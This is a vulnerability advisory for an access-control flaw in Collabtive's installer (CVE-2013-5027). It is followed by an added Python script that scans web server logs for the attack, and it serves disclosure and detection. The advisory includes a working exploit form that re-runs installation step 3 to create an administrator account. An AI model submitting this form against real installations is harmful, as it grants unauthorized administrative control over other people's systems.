High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Collabtive which can be exploited to gain complete control over the application.
- Improper Access Control in Collabtive: CVE-2013-5027
The vulnerability exists due to improper access restrictions on the third installation step, which remains reachable after the application has been successfully installed. A remote attacker can send a specially crafted HTTP POST request to the "/install.php" script and create a new user with administrative privileges. The installation script is not deleted after the application has been installed and is publicly accessible by default.
The following exploitation example creates a user with login “newadmin” and password “newpass”:
<!-- Submitting this form re-runs installation step 3 and creates an administrator account -->
<form action="http://[host]/install.php?action=step3" method="post" name="main">
<input type="hidden" name="name" value="newadmin">
<input type="hidden" name="pass" value="newpass">
<input type="submit" id="btn">
</form>
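The following triage script is an added example and is not part of the original advisory or of the Collabtive project. It scans web server access logs for the request pattern described above: any request to install.php on a deployed instance is suspicious because the installer should have been removed, and a POST to install.php?action=step3 that is not rejected is the administrator-creation step itself. The log lines are constructed for the example, the combined log format and the status-code interpretation (403/404 meaning the installer is gone or blocked) are assumptions, and the function and class names are the example's own.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2013:14:02:11 +0000] "GET /collabtive/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2013:14:02:19 +0000] "GET /collabtive/install.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2013:14:02:31 +0000] "POST /collabtive/install.php?action=step3 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Aug/2013:14:05:02 +0000] "GET /collabtive/managefile.php?action=showproject&id=1 HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
192.0.2.9 - - [11/Aug/2013:09:12:45 +0000] "GET /collabtive/install.php HTTP/1.1" 404 196 "-" "curl/7.29.0"
"""

# Enough of the combined log format to recover client, timestamp, method, target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass
class Finding:
    ip: str
    ts: str
    method: str
    target: str
    status: int
    severity: str
    reason: str


def classify(method, target, status):
    """Return (severity, reason) for one request, or None if it does not touch install.php."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() != "install.php":
        return None
    # Assumption: 403/404 means the installer was removed or blocked, so this is only a probe.
    if status in (403, 404):
        return ("info", "installer probed but not reachable (removed or blocked)")
    action = parse_qs(parts.query).get("action", [""])[0]
    if method == "POST" and action == "step3":
        return ("critical", "POST to install.php?action=step3: admin account creation (CVE-2013-5027)")
    return ("high", "installer script reachable after installation")


def scan_log(text):
    """Parse each log line and collect findings for requests against install.php."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; skip rather than guess
        status = int(m["status"])
        verdict = classify(m["method"], m["target"], status)
        if verdict is None:
            continue
        severity, reason = verdict
        findings.append(Finding(m["ip"], m["ts"], m["method"], m["target"], status, severity, reason))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f.severity}] {f.ts} {f.ip} {f.method} {f.target} -> {f.status}: {f.reason}")
```

On the constructed log the second and third lines from 203.0.113.7 are flagged as "high" and then "critical": the client first loaded the installer and then submitted step 3, which is exactly the sequence the exploit form produces. Any "critical" finding should be followed by a review of the Collabtive user table for accounts created at that timestamp, and the installer should be removed or access to it denied at the web server.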